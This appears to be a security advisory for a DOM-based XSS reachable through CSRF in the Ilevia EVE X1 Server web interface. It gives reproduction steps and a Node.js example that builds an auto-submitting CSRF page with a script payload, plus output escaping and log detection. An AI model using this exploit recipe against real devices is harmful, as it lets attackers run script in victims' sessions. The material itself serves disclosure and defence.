Ilevia EVE X1 Server Cross-Site Scripting Vulnerability
Vulnerability
A cross-site scripting (XSS) vulnerability has been identified in Ilevia EVE X1 Server firmware versions through 4.7.18.0.eden and logic versions through 6.00 - 2025_07_21. It allows a remote attacker to run arbitrary JavaScript in the browser of a user of the '/index.php' web interface. The root cause is improper neutralization of user-supplied input during web page generation, resulting in a DOM-based XSS. Because the request that carries the payload can also be forged from another origin (cross-site request forgery, CSRF), a victim who merely visits an attacker-controlled page can be made to submit it; the injected script then runs with the victim's session and can read internal system data that the interface exposes.
Impact
Successful exploitation lets the attacker execute script of their choosing in the victim's browser, in the origin of the EVE X1 web interface and with the victim's session. Anything the logged-in user can see or do through that interface is reachable by the script, so the impact is bounded by the victim's privileges and by what the web interface exposes.
Reproduction
To reproduce, send a POST request to '/ajax/php/bh_web_backend.php' with the 'a' parameter set to 'r' and the 'p' parameter set to a crafted payload that contains a script tag. The request can be issued manually (for example from a browser's developer tools or an intercepting proxy) or through an HTML form that submits the same fields. Since the endpoint accepts the request without anti-CSRF protection, that form can be placed on a page the victim is likely to visit, such as an attacker-controlled web page, and auto-submitted. To confirm the finding, check that the script actually executes in the browser session of a logged-in EVE X1 user rather than merely appearing in the response body.
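The following is an added example, not code from the advisory or from Ilevia. It models the request described above (POST 'a=r' and 'p=<payload>' to '/ajax/php/bh_web_backend.php'), builds the cross-origin auto-submitting form that delivers it as CSRF, contrasts the unsafe echoing of 'p' with HTML-escaped output (the neutralization the advisory says is missing), and flags the request in constructed log lines. The device host name, the assumption that 'p' is echoed into a div, and the log line format are illustrative assumptions. Run it with Node.js.

```javascript
// Added example; not part of the advisory or the vendor's code.
const ENDPOINT = "/ajax/php/bh_web_backend.php";   // endpoint named in the advisory
const TARGET_HOST = "http://eve-x1.local";          // assumption: device address on the victim's LAN
const PAYLOAD = "<script>alert(document.domain)</script>"; // benign marker payload

// Minimal HTML escaping for text and attribute contexts.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Form-encoded body of the request from the advisory, as a browser would send it.
function buildBody(payload) {
  return new URLSearchParams({ a: "r", p: payload }).toString();
}

// CSRF delivery: a page the victim visits that auto-submits the request with the
// victim's cookies. The payload is entity-escaped inside the attribute so the HTML
// parser stores it verbatim; the browser submits the decoded (raw) value.
function buildCsrfPage(host, payload) {
  return [
    "<!doctype html><html><body>",
    `<form id="f" method="POST" action="${escapeHtml(host + ENDPOINT)}">`,
    '<input type="hidden" name="a" value="r">',
    `<input type="hidden" name="p" value="${escapeHtml(payload)}">`,
    "</form>",
    "<script>document.getElementById('f').submit();</script>",
    "</body></html>",
  ].join("\n");
}

// Server-side rendering of 'p' (assumed to be echoed into the page body):
// vulnerable form beside the escaped form.
function renderUnsafe(p) { return `<div id="out">${p}</div>`; }
function renderEscaped(p) { return `<div id="out">${escapeHtml(p)}</div>`; }

// True if an HTML string still contains a live <script> opening tag.
function containsScriptTag(html) { return /<script\b/i.test(html); }

// Detection: flag POSTs to the endpoint whose decoded 'p' parameter carries a
// script tag. Lines are "METHOD PATH BODY" (constructed format, not a real device log).
function flagSuspicious(logLines) {
  return logLines.filter((line) => {
    const [method, path, body = ""] = line.split(" ");
    if (method !== "POST" || path !== ENDPOINT) return false;
    const p = new URLSearchParams(body).get("p") || "";
    return containsScriptTag(p);
  });
}

// Constructed sample traffic.
const SAMPLE_LOG = [
  "GET /index.php -",
  `POST ${ENDPOINT} ${buildBody("ok")}`,
  `POST ${ENDPOINT} ${buildBody(PAYLOAD)}`,
];

console.log(buildCsrfPage(TARGET_HOST, PAYLOAD));
console.log(renderUnsafe(PAYLOAD), "-> script tag present:", containsScriptTag(renderUnsafe(PAYLOAD)));
console.log(renderEscaped(PAYLOAD), "-> script tag present:", containsScriptTag(renderEscaped(PAYLOAD)));
console.log("flagged:", flagSuspicious(SAMPLE_LOG));
```

The escaped rendering neutralizes the payload because '<' and '>' no longer reach the HTML parser as tag delimiters; the CSRF page only works because the endpoint accepts a plain form POST with the victim's cookies, so an anti-CSRF token or a SameSite cookie policy would break the delivery even before the output encoding fix.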
